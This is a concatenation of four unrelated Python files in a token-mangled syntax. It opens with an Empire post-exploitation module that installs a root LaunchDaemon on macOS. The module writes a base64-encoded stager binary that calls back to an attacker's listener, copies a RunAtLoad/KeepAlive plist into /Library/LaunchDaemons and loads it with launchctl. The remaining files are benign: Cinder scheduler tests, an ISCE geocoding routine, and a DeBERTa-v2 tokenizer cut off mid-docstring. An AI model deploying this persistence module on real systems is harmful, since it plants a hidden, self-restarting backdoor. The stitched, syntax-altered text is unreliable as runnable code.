<import_stmt>base64<class_stmt>Module<block_start><def_stmt>__init__ self mainMenu params=[]# metadata info about the module, not modified during runtime <block_start>self.info={# name for the module that will appear in module menus 'Name':'LaunchDaemon' # list of one or more authors for the module 'Author':['@xorrior'] # more verbose multi-line description of the module 'Description':('Installs an Empire launchDaemon.') # True if the module needs to run in the background 'Background':<false> # File extension to save the file as 'OutputExtension':<none> # if the module needs administrative privileges 'NeedsAdmin':<true> # True if the method doesn't touch disk/is reasonably opsec safe 'OpsecSafe':<false> # the module language 'Language':'python' # the minimum language version needed 'MinLanguageVersion':'2.6' # list of any references/other comments 'Comments':[]}<line_sep># any options needed by the module, settable during runtime self.options={# format: # value_name : {description, required, default_value} 'Agent':{# The 'Agent' option is the only one that MUST be in a module 'Description':'Agent to execute module on.' 'Required':<true> 'Value':''} 'Listener':{'Description':'Listener to use.' 'Required':<true> 'Value':''} 'SafeChecks':{'Description':'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.' 'Required':<true> 'Value':'True'} 'UserAgent':{'Description':'User-agent string to use for the staging request (default, none, or other).' 'Required':<false> 'Value':'default'} 'DaemonName':{'Description':'Name of the Launch Daemon to install. Name will also be used for the plist file.' 'Required':<true> 'Value':'com.proxy.initialize'} 'DaemonLocation':{'Description':'The full path of where the Empire launch daemon should be located.' 'Required':<true> 'Value':''}}<line_sep># save off a copy of the mainMenu object to access external functionality # like listeners/agent handlers/etc. self.mainMenu=mainMenu<line_sep># During instantiation, any settable option parameters # are passed as an object set to the module and the # options dictionary is automatically set. This is mostly # in case options are passed on the command line <if_stmt>params<block_start><for_stmt>param params# parameter format is [Name, Value] <block_start>option,value=param<if_stmt>option<in>self.options<block_start>self.options[option]['Value']=value<block_end><block_end><block_end><block_end><def_stmt>generate self obfuscate=<false> obfuscationCommand=""<block_start>daemonName=self.options['DaemonName']['Value']<line_sep>programname=self.options['DaemonLocation']['Value']<line_sep>plistfilename="%s.plist"%daemonName<line_sep>listenerName=self.options['Listener']['Value']<line_sep>userAgent=self.options['UserAgent']['Value']<line_sep>safeChecks=self.options['SafeChecks']['Value']<line_sep>launcher=self.mainMenu.stagers.generate_launcher(listenerName language='python' userAgent=userAgent safeChecks=safeChecks)<line_sep>launcher=launcher.strip('echo').strip(' | python &').strip("\"")<line_sep>machoBytes=self.mainMenu.stagers.generate_macho(launcherCode=launcher)<line_sep>encBytes=base64.b64encode(machoBytes)<line_sep>plistSettings=""" <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0"> <plist version="1.0"> <dict> <key>Label</key> <string>%s</string> <key>ProgramArguments</key> <array> <string>%s</string> </array> <key>RunAtLoad</key> <true/> <key>KeepAlive</key> <true/> </dict> </plist> """%(daemonName programname)<line_sep>script=""" import subprocess import sys import base64 import os encBytes = "%s" bytes = base64.b64decode(encBytes) plist = \"\"\" %s \"\"\" daemonPath = "%s" if not os.path.exists(os.path.split(daemonPath)[0]): os.makedirs(os.path.split(daemonPath)[0]) e = open(daemonPath,'wb') e.write(bytes) e.close() os.chmod(daemonPath, 0777) f = open('/tmp/%s','w') f.write(plist) f.close() process = subprocess.Popen('chmod 644 /tmp/%s', stdout=subprocess.PIPE, shell=True) process.communicate() process = subprocess.Popen('chown -R root /tmp/%s', stdout=subprocess.PIPE, shell=True) process.communicate() process = subprocess.Popen('chown :wheel /tmp/%s', stdout=subprocess.PIPE, shell=True) process.communicate() process = subprocess.Popen('mv /tmp/%s /Library/LaunchDaemons/%s', stdout=subprocess.PIPE, shell=True) process.communicate() process = subprocess.Popen('launchctl load /Library/LaunchDaemons/%s', stdout=subprocess.PIPE, shell=True) process.communicate() print "\\n[+] Persistence has been installed: /Library/LaunchDaemons/%s" print "\\n[+] Empire daemon has been written to %s" """%(encBytes plistSettings programname plistfilename plistfilename plistfilename plistfilename plistfilename plistfilename plistfilename plistfilename programname)<line_sep><return>script<block_end><block_end>
# Copyright 2011-2012 OpenStack Foundation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Tests For Capacity Weigher."""<import_from_stmt>datetime datetime<import_from_stmt>unittest mock<import_stmt>ddt<import_from_stmt>cinder.common constants<import_from_stmt>cinder context<import_from_stmt>cinder.scheduler weights<import_from_stmt>cinder.tests.unit.scheduler fakes<import_from_stmt>cinder.tests.unit test<import_from_stmt>cinder.volume volume_utils<line_sep>@ddt.ddt<class_stmt>CapacityWeigherTestCase(test.TestCase)<block_start><def_stmt>setUp self<block_start>super(CapacityWeigherTestCase self).setUp()<line_sep>self.host_manager=fakes.FakeHostManager()<line_sep>self.weight_handler=weights.OrderedHostWeightHandler('cinder.scheduler.weights')<block_end><def_stmt>_get_weighed_hosts self hosts weight_properties=<none><block_start><if_stmt>weight_properties<is><none><block_start>weight_properties={'size':1}<block_end><return>self.weight_handler.get_weighed_objects([weights.capacity.CapacityWeigher] hosts weight_properties)<block_end>@mock.patch('cinder.db.sqlalchemy.api.service_get_all')<def_stmt>_get_all_backends self _mock_service_get_all disabled=<false><block_start>ctxt=context.get_admin_context()<line_sep>fakes.mock_host_manager_db_calls(_mock_service_get_all disabled=disabled)<line_sep>backend_states=self.host_manager.get_all_backend_states(ctxt)<line_sep>_mock_service_get_all.assert_called_once_with(ctxt <none> # backend_match_level topic=constants.VOLUME_TOPIC frozen=<false> disabled=disabled)<line_sep><return>backend_states<block_end># If thin and thin_provisioning_support are True, # use the following formula: # free = (total * host_state.max_over_subscription_ratio # - host_state.provisioned_capacity_gb # - math.floor(total * reserved)) # Otherwise, use the following formula: # free = free_space - math.floor(total * reserved) @ddt.data({'volume_type':{'extra_specs':{'provisioning:type':'thin'}} 'winner':'host2'} {'volume_type':{'extra_specs':{'provisioning:type':'thick'}} 'winner':'host1'} {'volume_type':{'extra_specs':{}} 'winner':'host2'} {'volume_type':{} 'winner':'host2'} {'volume_type':<none> 'winner':'host2'} )@ddt.unpack<def_stmt>test_default_of_spreading_first self volume_type winner<block_start>backend_info_list=self._get_all_backends()<line_sep># Results for the 1st test # {'provisioning:type': 'thin'}: # host1: thin_provisioning_support = False # free_capacity_gb=1024, # free=1024-math.floor(1024*0.1)=922 # Norm=0.837837837838 # host2: thin_provisioning_support = True # free_capacity_gb=300, # free=2048*1.5-1748-math.floor(2048*0.1)=1120 # Norm=1.0 # host3: thin_provisioning_support = False # free_capacity_gb=512, free=256-512*0=256 # Norm=0.292383292383 # host4: thin_provisioning_support = True # free_capacity_gb=200, # free=2048*1.0-2047-math.floor(2048*0.05)=-101 # Norm=0.0 # host5: free_capacity_gb=unknown free=-1 # Norm=0.0819000819001 # so, host2 should win: weight_properties={'size':1 'volume_type':volume_type }<line_sep>weighed_host=self._get_weighed_hosts(backend_info_list weight_properties=weight_properties)[0]<line_sep>self.assertEqual(1.0 weighed_host.weight)<line_sep>self.assertEqual(winner volume_utils.extract_host(weighed_host.obj.host))<block_end>@ddt.data({'volume_type':{'extra_specs':{'provisioning:type':'thin'}} 'winner':'host4'} {'volume_type':{'extra_specs':{'provisioning:type':'thick'}} 'winner':'host2'} {'volume_type':{'extra_specs':{}} 'winner':'host4'} {'volume_type':{} 'winner':'host4'} {'volume_type':<none> 'winner':'host4'} )@ddt.unpack<def_stmt>test_capacity_weight_multiplier1 self volume_type winner<block_start>self.flags(capacity_weight_multiplier=-1.0)<line_sep>backend_info_list=self._get_all_backends()<line_sep># Results for the 1st test # {'provisioning:type': 'thin'}: # host1: thin_provisioning_support = False # free_capacity_gb=1024, # free=-(1024-math.floor(1024*0.1))=-922 # Norm=-0.00829542413701 # host2: thin_provisioning_support = True # free_capacity_gb=300, # free=-(2048*1.5-1748-math.floor(2048*0.1))=-1120 # Norm=-0.00990099009901 # host3: thin_provisioning_support = False # free_capacity_gb=512, free=-(256-512*0)=-256 # Norm=--0.002894884083 # host4: thin_provisioning_support = True # free_capacity_gb=200, # free=-(2048*1.0-2047-math.floor(2048*0.05))=101 # Norm=0.0 # host5: free_capacity_gb=unknown free=-float('inf') # Norm=-1.0 # so, host4 should win: weight_properties={'size':1 'volume_type':volume_type }<line_sep>weighed_host=self._get_weighed_hosts(backend_info_list weight_properties=weight_properties)<line_sep>weighed_host=weighed_host[0]<line_sep>self.assertEqual(0.0 weighed_host.weight)<line_sep>self.assertEqual(winner volume_utils.extract_host(weighed_host.obj.host))<block_end>@ddt.data({'volume_type':{'extra_specs':{'provisioning:type':'thin'}} 'winner':'host2'} {'volume_type':{'extra_specs':{'provisioning:type':'thick'}} 'winner':'host1'} {'volume_type':{'extra_specs':{}} 'winner':'host2'} {'volume_type':{} 'winner':'host2'} {'volume_type':<none> 'winner':'host2'} )@ddt.unpack<def_stmt>test_capacity_weight_multiplier2 self volume_type winner<block_start>self.flags(capacity_weight_multiplier=2.0)<line_sep>backend_info_list=self._get_all_backends()<line_sep># Results for the 1st test # {'provisioning:type': 'thin'}: # host1: thin_provisioning_support = False # free_capacity_gb=1024, # free=(1024-math.floor(1024*0.1))*2=1844 # Norm=1.67567567568 # host2: thin_provisioning_support = True # free_capacity_gb=300, # free=(2048*1.5-1748-math.floor(2048*0.1))*2=2240 # Norm=2.0 # host3: thin_provisioning_support = False # free_capacity_gb=512, free=(256-512*0)*2=512 # Norm=0.584766584767 # host4: thin_provisioning_support = True # free_capacity_gb=200, # free=(2048*1.0-2047-math.floor(2048*0.05))*2=-202 # Norm=0.0 # host5: free_capacity_gb=unknown free=-2 # Norm=0.1638001638 # so, host2 should win: weight_properties={'size':1 'volume_type':volume_type }<line_sep>weighed_host=self._get_weighed_hosts(backend_info_list weight_properties=weight_properties)[0]<line_sep>self.assertEqual(1.0<times>2 weighed_host.weight)<line_sep>self.assertEqual(winner volume_utils.extract_host(weighed_host.obj.host))<block_end><def_stmt>test_capacity_weight_no_unknown_or_infinite self<block_start>self.flags(capacity_weight_multiplier=-1.0)<del_stmt>self.host_manager.service_states['host5']<line_sep>backend_info_list=self._get_all_backends()<line_sep># host1: thin_provisioning_support = False # free_capacity_gb=1024, # free=(1024-math.floor(1024*0.1))=-922 # Norm=-0.837837837838 # host2: thin_provisioning_support = True # free_capacity_gb=300, # free=(2048*1.5-1748-math.floor(2048*0.1))=-1120 # Norm=-1.0 # host3: thin_provisioning_support = False # free_capacity_gb=512, free=(256-512*0)=-256 # Norm=-0.292383292383 # host4: thin_provisioning_support = True # free_capacity_gb=200, # free=(2048*1.0-2047-math.floor(2048*0.05))=101 # Norm=0.0 # so, host4 should win: weighed_hosts=self._get_weighed_hosts(backend_info_list)<line_sep>best_host=weighed_hosts[0]<line_sep>self.assertEqual(0.0 best_host.weight)<line_sep>self.assertEqual('host4' volume_utils.extract_host(best_host.obj.host))<line_sep># and host2 is the worst: worst_host=weighed_hosts[-1]<line_sep>self.assertEqual(-1.0 worst_host.weight)<line_sep>self.assertEqual('host2' volume_utils.extract_host(worst_host.obj.host))<block_end><def_stmt>test_capacity_weight_free_unknown self<block_start>self.flags(capacity_weight_multiplier=-1.0)<line_sep>self.host_manager.service_states['host5']={'total_capacity_gb':3000 'free_capacity_gb':'unknown' 'allocated_capacity_gb':1548 'provisioned_capacity_gb':1548 'max_over_subscription_ratio':1.0 'thin_provisioning_support':<true> 'thick_provisioning_support':<false> 'reserved_percentage':5 'timestamp':datetime.utcnow()}<line_sep>backend_info_list=self._get_all_backends()<line_sep># host1: thin_provisioning_support = False # free_capacity_gb=1024, # free=(1024-math.floor(1024*0.1))=-922 # Norm= -0.00829542413701 # host2: thin_provisioning_support = True # free_capacity_gb=300, # free=(2048*1.5-1748-math.floor(2048*0.1))=-1120 # Norm=-0.00990099009901 # host3: thin_provisioning_support = False # free_capacity_gb=512, free=(256-512*0)=-256 # Norm=-0.002894884083 # host4: thin_provisioning_support = True # free_capacity_gb=200, # free=(2048*1.0-2047-math.floor(2048*0.05))=101 # Norm=0.0 # host5: free_capacity_gb=unknown free=3000 # Norm=-1.0 # so, host4 should win: weighed_hosts=self._get_weighed_hosts(backend_info_list)<line_sep>best_host=weighed_hosts[0]<line_sep>self.assertEqual(0.0 best_host.weight)<line_sep>self.assertEqual('host4' volume_utils.extract_host(best_host.obj.host))<line_sep># and host5 is the worst: worst_host=weighed_hosts[-1]<line_sep>self.assertEqual(-1.0 worst_host.weight)<line_sep>self.assertEqual('host5' volume_utils.extract_host(worst_host.obj.host))<block_end><def_stmt>test_capacity_weight_cap_unknown self<block_start>self.flags(capacity_weight_multiplier=-1.0)<line_sep>self.host_manager.service_states['host5']={'total_capacity_gb':'unknown' 'free_capacity_gb':3000 'allocated_capacity_gb':1548 'provisioned_capacity_gb':1548 'max_over_subscription_ratio':1.0 'thin_provisioning_support':<true> 'thick_provisioning_support':<false> 'reserved_percentage':5 'timestamp':datetime.utcnow()}<line_sep>backend_info_list=self._get_all_backends()<line_sep># host1: thin_provisioning_support = False # free_capacity_gb=1024, # free=(1024-math.floor(1024*0.1))=-922 # Norm= -0.00829542413701 # host2: thin_provisioning_support = True # free_capacity_gb=300, # free=(2048*1.5-1748-math.floor(2048*0.1))=-1120 # Norm=-0.00990099009901 # host3: thin_provisioning_support = False # free_capacity_gb=512, free=(256-512*0)=-256 # Norm=-0.002894884083 # host4: thin_provisioning_support = True # free_capacity_gb=200, # free=(2048*1.0-2047-math.floor(2048*0.05))=101 # Norm=0.0 # host5: free_capacity_gb=3000 free=unknown # Norm=-1.0 # so, host4 should win: weighed_hosts=self._get_weighed_hosts(backend_info_list)<line_sep>best_host=weighed_hosts[0]<line_sep>self.assertEqual(0.0 best_host.weight)<line_sep>self.assertEqual('host4' volume_utils.extract_host(best_host.obj.host))<line_sep># and host5 is the worst: worst_host=weighed_hosts[-1]<line_sep>self.assertEqual(-1.0 worst_host.weight)<line_sep>self.assertEqual('host5' volume_utils.extract_host(worst_host.obj.host))<block_end><def_stmt>test_capacity_weight_free_infinite self<block_start>self.flags(capacity_weight_multiplier=-1.0)<line_sep>self.host_manager.service_states['host5']={'total_capacity_gb':3000 'free_capacity_gb':'infinite' 'allocated_capacity_gb':1548 'provisioned_capacity_gb':1548 'max_over_subscription_ratio':1.0 'thin_provisioning_support':<true> 'thick_provisioning_support':<false> 'reserved_percentage':5 'timestamp':datetime.utcnow()}<line_sep>backend_info_list=self._get_all_backends()<line_sep># host1: thin_provisioning_support = False # free_capacity_gb=1024, # free=(1024-math.floor(1024*0.1))=-922 # Norm= -0.00829542413701 # host2: thin_provisioning_support = True # free_capacity_gb=300, # free=(2048*1.5-1748-math.floor(2048*0.1))=-1120 # Norm=-0.00990099009901 # host3: thin_provisioning_support = False # free_capacity_gb=512, free=(256-512*0)=-256 # Norm=-0.002894884083 # host4: thin_provisioning_support = True # free_capacity_gb=200, # free=(2048*1.0-2047-math.floor(2048*0.05))=101 # Norm=0.0 # host5: free_capacity_gb=infinite free=3000 # Norm=-1.0 # so, host4 should win: weighed_hosts=self._get_weighed_hosts(backend_info_list)<line_sep>best_host=weighed_hosts[0]<line_sep>self.assertEqual(0.0 best_host.weight)<line_sep>self.assertEqual('host4' volume_utils.extract_host(best_host.obj.host))<line_sep># and host5 is the worst: worst_host=weighed_hosts[-1]<line_sep>self.assertEqual(-1.0 worst_host.weight)<line_sep>self.assertEqual('host5' volume_utils.extract_host(worst_host.obj.host))<block_end><def_stmt>test_capacity_weight_cap_infinite self<block_start>self.flags(capacity_weight_multiplier=-1.0)<line_sep>self.host_manager.service_states['host5']={'total_capacity_gb':'infinite' 'free_capacity_gb':3000 'allocated_capacity_gb':1548 'provisioned_capacity_gb':1548 'max_over_subscription_ratio':1.0 'thin_provisioning_support':<true> 'thick_provisioning_support':<false> 'reserved_percentage':5 'timestamp':datetime.utcnow()}<line_sep>backend_info_list=self._get_all_backends()<line_sep># host1: thin_provisioning_support = False # free_capacity_gb=1024, # free=(1024-math.floor(1024*0.1))=-922 # Norm= -0.00829542413701 # host2: thin_provisioning_support = True # free_capacity_gb=300, # free=(2048*1.5-1748-math.floor(2048*0.1))=-1120 # Norm=-0.00990099009901 # host3: thin_provisioning_support = False # free_capacity_gb=512, free=(256-512*0)=-256 # Norm=-0.002894884083 # host4: thin_provisioning_support = True # free_capacity_gb=200, # free=(2048*1.0-2047-math.floor(2048*0.05))=101 # Norm=0.0 # host5: free_capacity_gb=3000 free=infinite # Norm=-1.0 # so, host4 should win: weighed_hosts=self._get_weighed_hosts(backend_info_list)<line_sep>best_host=weighed_hosts[0]<line_sep>self.assertEqual(0.0 best_host.weight)<line_sep>self.assertEqual('host4' volume_utils.extract_host(best_host.obj.host))<line_sep># and host5 is the worst: worst_host=weighed_hosts[-1]<line_sep>self.assertEqual(-1.0 worst_host.weight)<line_sep>self.assertEqual('host5' volume_utils.extract_host(worst_host.obj.host))<block_end><block_end>
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Copyright 2014 California Institute of Technology. ALL RIGHTS RESERVED. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # United States Government Sponsorship acknowledged. This software is subject to # U.S. export control laws and regulations and has been classified as 'EAR99 NLR' # (No [Export] License Required except when exporting to an embargoed country, # end user, or in support of a prohibited end use). By downloading this software, # the user agrees to comply with all applicable U.S. export laws and regulations. # The user has the responsibility to obtain export licenses, or other export # authority as may be required before exporting this software to any 'EAR99' # embargoed foreign country or citizen of those countries. # # Authors: <NAME>, <NAME> #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Comment: Adapted from InsarProc/runGeocode.py <import_stmt>logging<import_stmt>stdproc<import_from_stmt>stdproc.rectify.geocode.Geocodable Geocodable<import_stmt>isceobj<line_sep>#from contextlib import nested <import_from_stmt>iscesys.ImageUtil.ImageUtil ImageUtil<as>IU<import_from_stmt>iscesys.StdOEL.StdOELPy create_writer<import_stmt>os<line_sep>logger=logging.getLogger('isce.isceProc.runGeocode')<line_sep>posIndx=1<def_stmt>runGeocode self prodlist unwrapflag bbox<block_start>'''Generalized geocoding of all the files listed above (in prodlist).'''<if_stmt>isinstance(prodlist str)<block_start><import_from_stmt>isceobj.Util.StringUtils StringUtils<as>SU<line_sep>tobeGeocoded=SU.listify(prodlist)<block_end><else_stmt><block_start>tobeGeocoded=prodlist<block_end>#####Remove the unwrapped interferogram if no unwrapping is done <if_stmt><not>unwrapflag<block_start><try_stmt><block_start>tobeGeocoded.remove(self._isce.unwrappedIntFilename)<block_end><except_stmt>ValueError<block_start><pass><block_end><block_end>print('Number of products to geocode: ' len(tobeGeocoded))<line_sep>stdWriter=create_writer("log" "" <true> filename="geo.log")<line_sep>velocity,height=self._isce.vh()<if_stmt>bbox<is><not><none><block_start>snwe=list(bbox)<if_stmt>len(snwe)<ne>4<block_start><raise>valueError('Bounding box should be a list/tuple of length 4')<block_end><block_end><else_stmt><block_start>snwe=self._isce.topo.snwe<block_end>infos={}<for_stmt>attribute ['demCropFilename' 'numberRangeLooks' 'numberAzimuthLooks' 'is_mocomp' 'demImage' 'peg' 'dopplerCentroid']<block_start>infos[attribute]=getattr(self._isce attribute)<block_end><for_stmt>sceneid1,sceneid2 self._isce.selectedPairs<block_start>pair=(sceneid1 sceneid2)<for_stmt>pol self._isce.selectedPols<block_start>frame1=self._isce.frames[sceneid1][pol]<line_sep>formSLC1=self._isce.formSLCs[sceneid1][pol]<line_sep>sid=self._isce.formatname(pair pol)<line_sep>infos['outputPath']=os.path.join(self.getoutputdir(sceneid1 sceneid2) sid)<line_sep>catalog=isceobj.Catalog.createCatalog(self._isce.procDoc.name)<line_sep>run(tobeGeocoded frame1 formSLC1 velocity height snwe infos catalog=catalog sceneid=sid)<line_sep>self._isce.procDoc.addAllFromCatalog(catalog)<block_end><block_end><block_end><def_stmt>run tobeGeocoded frame1 formSLC1 velocity height snwe infos catalog=<none> sceneid='NO_ID'<block_start>logger.info("Geocoding Image: %s"%sceneid)<line_sep>stdWriter=create_writer("log" "" <true> filename=infos['outputPath']+".geo.log")<line_sep>planet=frame1.getInstrument().getPlatform().getPlanet()<line_sep>doppler=infos['dopplerCentroid'].getDopplerCoefficients(inHz=<false>)[0]<line_sep>#####Geocode one by one <for_stmt>prod tobeGeocoded<block_start>prodPath=infos['outputPath']+'.'+prod<if_stmt><not>os.path.isfile(prodPath)<block_start>logger.info("File not found. Skipping %s"%prodPath)#KK some prods are only in refScene folder! (tbd) <continue><block_end>#else: objGeo=stdproc.createGeocode('insarapp_geocode_'+os.path.basename(prod).replace('.' ''))<line_sep>objGeo.configure()<line_sep>objGeo.referenceOrbit=formSLC1.getMocompPosition(posIndx)<line_sep>####IF statements to check for user configuration <if_stmt>objGeo.minimumLatitude<is><none><block_start>objGeo.minimumLatitude=snwe[0]<block_end><if_stmt>objGeo.maximumLatitude<is><none><block_start>objGeo.maximumLatitude=snwe[1]<block_end><if_stmt>objGeo.minimumLongitude<is><none><block_start>objGeo.minimumLongitude=snwe[2]<block_end><if_stmt>objGeo.maximumLongitude<is><none><block_start>objGeo.maximumLongitude=snwe[3]<block_end><if_stmt>objGeo.demCropFilename<is><none><block_start>objGeo.demCropFilename=infos['outputPath']+'.'+infos['demCropFilename']<block_end><if_stmt>objGeo.dopplerCentroidConstantTerm<is><none><block_start>objGeo.dopplerCentroidConstantTerm=doppler<block_end><if_stmt>objGeo.bodyFixedVelocity<is><none><block_start>objGeo.bodyFixedVelocity=velocity<block_end><if_stmt>objGeo.spacecraftHeight<is><none><block_start>objGeo.spacecraftHeight=height<block_end><if_stmt>objGeo.numberRangeLooks<is><none><block_start>objGeo.numberRangeLooks=infos['numberRangeLooks']<block_end><if_stmt>objGeo.numberAzimuthLooks<is><none><block_start>objGeo.numberAzimuthLooks=infos['numberAzimuthLooks']<block_end><if_stmt>objGeo.isMocomp<is><none><block_start>objGeo.isMocomp=infos['is_mocomp']<block_end>objGeo.stdWriter=stdWriter<line_sep>#create the instance of the image and return the method is supposed to use ge=Geocodable()<line_sep>inImage,objGeo.method=ge.create(prodPath)<if_stmt>objGeo.method<is><none><block_start>objGeo.method=method<block_end><if_stmt>inImage<block_start>demImage=isceobj.createDemImage()<line_sep>IU.copyAttributes(infos['demImage'] demImage)<line_sep>objGeo(peg=infos['peg'] frame=frame1 planet=planet dem=demImage tobegeocoded=inImage geoPosting=<none> referenceslc=formSLC1)<if_stmt>catalog<is><not><none><block_start>isceobj.Catalog.recordInputsAndOutputs(catalog objGeo "runGeocode.%s.%s"%(sceneid prodPath) logger "runGeocode.%s.%s"%(sceneid prodPath))<block_end><block_end><block_end>stdWriter.finalize()<block_end>
# coding=utf-8 # Copyright 2020 Microsoft and the HuggingFace Inc. team. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Fast Tokenization class for model DeBERTa."""<import_stmt>os<import_from_stmt>shutil copyfile<import_from_stmt>typing Optional Tuple<import_from_stmt>...file_utils is_sentencepiece_available<import_from_stmt>...tokenization_utils_fast PreTrainedTokenizerFast<import_from_stmt>...utils logging<if_stmt>is_sentencepiece_available()<block_start><import_from_stmt>.tokenization_deberta_v2 DebertaV2Tokenizer<block_end><else_stmt><block_start>DebertaV2Tokenizer=<none><block_end>logger=logging.get_logger(__name__)<line_sep>VOCAB_FILES_NAMES={"vocab_file":"spm.model" "tokenizer_file":"tokenizer.json"}<line_sep>PRETRAINED_VOCAB_FILES_MAP={"vocab_file":{"microsoft/deberta-v2-xlarge":"https://huggingface.co/microsoft/deberta-v2-xlarge/resolve/main/spm.model" "microsoft/deberta-v2-xxlarge":"https://huggingface.co/microsoft/deberta-v2-xxlarge/resolve/main/spm.model" "microsoft/deberta-v2-xlarge-mnli":"https://huggingface.co/microsoft/deberta-v2-xlarge-mnli/resolve/main/spm.model" "microsoft/deberta-v2-xxlarge-mnli":"https://huggingface.co/microsoft/deberta-v2-xxlarge-mnli/resolve/main/spm.model" }}<line_sep>PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES={"microsoft/deberta-v2-xlarge":512 "microsoft/deberta-v2-xxlarge":512 "microsoft/deberta-v2-xlarge-mnli":512 "microsoft/deberta-v2-xxlarge-mnli":512 }<line_sep>PRETRAINED_INIT_CONFIGURATION={"microsoft/deberta-v2-xlarge":{"do_lower_case":<false>} "microsoft/deberta-v2-xxlarge":{"do_lower_case":<false>} "microsoft/deberta-v2-xlarge-mnli":{"do_lower_case":<false>} "microsoft/deberta-v2-xxlarge-mnli":{"do_lower_case":<false>} }<class_stmt>DebertaV2TokenizerFast(PreTrainedTokenizerFast)<block_start>r""" Constructs a DeBERTa-v2 fast tokenizer. Based on [SentencePiece](https://github.com/google/sentencepiece). Args: vocab_file (`str`): [SentencePiece](https://github.com/google/sentencepiece) file (generally has a *.spm* extension) that contains the vocabulary necessary to instantiate a tokenizer. do_lower_case (`bool`, *optional*, defaults to `False`): Whether or not to lowercase the input when tokenizing. bos_token (`string`, *optional*, defaults to `"[CLS]"`): The beginning of sequence token that was used during pre-training. Can be used a sequence classifier token. When building a sequence using special tokens, this is not the token that is used for the beginning of sequence. The token used is the `cls_token`. eos_token (`string`, *optional*, defaults to `"[SEP]"`): The end of sequence token. When building a sequence using special tokens, this is not the token that is used for the end of sequence. The token used is the `sep_token`. unk_token (`str`, *optional*, defaults to `"[UNK]"`): The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this token instead. sep_token (`str`, *optional*, defaults to `"[SEP]"`): The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for sequence classification or for a text and a question for question answering. It is also used as the last token of a sequence built with special tokens. pad_token (`str`, *optional*, defaults to `"[PAD]"`): The token used for padding, for example when batching sequences of different lengths. cls_token (`str`, *optional*, defaults to `"[CLS]"`): The classifier token which is used when doing sequence classification (classification of the whole sequence instead of per-token classification). It is the first token of the sequence when built with special tokens. mask_token (`str`, *optional*, defaults to `"[MASK]"`): The token used for masking values. This is the token used when training this model with masked language modeling. This is the token which the model will try to predict. sp_model_kwargs (`dict`, *optional*): Will be passed to the `SentencePieceProcessor.__init__()` method. The [Python wrapper for SentencePiece](https://github.com/google/sentencepiece/tree/master/python) can be used, among other things, to set: - `enable_sampling`: Enable subword regularization. - `nbest_size`: Sampling parameters for unigram. Invalid for BPE-Dropout. - `nbest_size = {0,1}`: No sampling is performed. - `nbest_size > 1`: samples from the nbest_size results. - `nbest_size < 0`: assuming that nbest_size is infinite and samples from the all hypothesis (lattice) using forward-filtering-and-backward-sampling algorithm. - `alpha`: Smoothing parameter for unigram sampling, and dropout probability of merge operations for BPE-dropout. """<line_sep>vocab_files_names=VOCAB_FILES_NAMES<line_sep>pretrained_vocab_files_map=PRETRAINED_VOCAB_FILES_MAP<line_sep>pretrained_init_configuration=PRETRAINED_INIT_CONFIGURATION<line_sep>max_model_input_sizes=PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES<line_sep>slow_tokenizer_class=DebertaV2Tokenizer<def_stmt>__init__ self vocab_file=<none> tokenizer_file=<none> do_lower_case=<false> split_by_punct=<false> bos_token="[CLS]" eos_token="[SEP]" unk_token="[UNK]" sep_token="[SEP]" pad_token="[PAD]" cls_token="[CLS]" mask_token="[MASK]" **kwargs<arrow><none><block_start>super().__init__(vocab_file tokenizer_file=tokenizer_file do_lower_case=do_lower_case bos_token=bos_token eos_token=eos_token unk_token=unk_token sep_token=sep_token pad_token=pad_token cls_token=cls_token mask_token=mask_token split_by_punct=split_by_punct **kwargs )<line_sep>self.do_lower_case=do_lower_case<line_sep>self.split_by_punct=split_by_punct<line_sep>self.vocab_file=vocab_file<line_sep>self.can_save_slow_tokenizer=<false><if><not>self.vocab_file<else><true><block_end><def_stmt>build_inputs_with_special_tokens self token_ids_0 token_ids_1=<none><block_start>""" Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and adding special tokens. A DeBERTa sequence has the following format: - single sequence: [CLS] X [SEP] - pair of sequences: [CLS] A [SEP] B [SEP] Args: token_ids_0 (`List[int]`): List of IDs to which the special tokens will be added. token_ids_1 (`List[int]`, *optional*): Optional second list of IDs for sequence pairs. Returns: `List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens. """<if_stmt>token_ids_1<is><none><block_start><return>[self.cls_token_id]+token_ids_0+[self.sep_token_id]<block_end>cls=[self.cls_token_id]<line_sep>sep=[self.sep_token_id]<line_sep><return>cls+token_ids_0+sep+token_ids_1+sep<block_end><def_stmt>get_special_tokens_mask self token_ids_0 token_ids_1=<none> already_has_special_tokens=<false><block_start>""" Retrieves sequence ids from a token list that has no special tokens added. This method is called when adding special tokens using the tokenizer `prepare_for_model` or `encode_plus` methods. Args: token_ids_0 (`List[int]`): List of IDs. token_ids_1 (`List[int]`, *optional*): 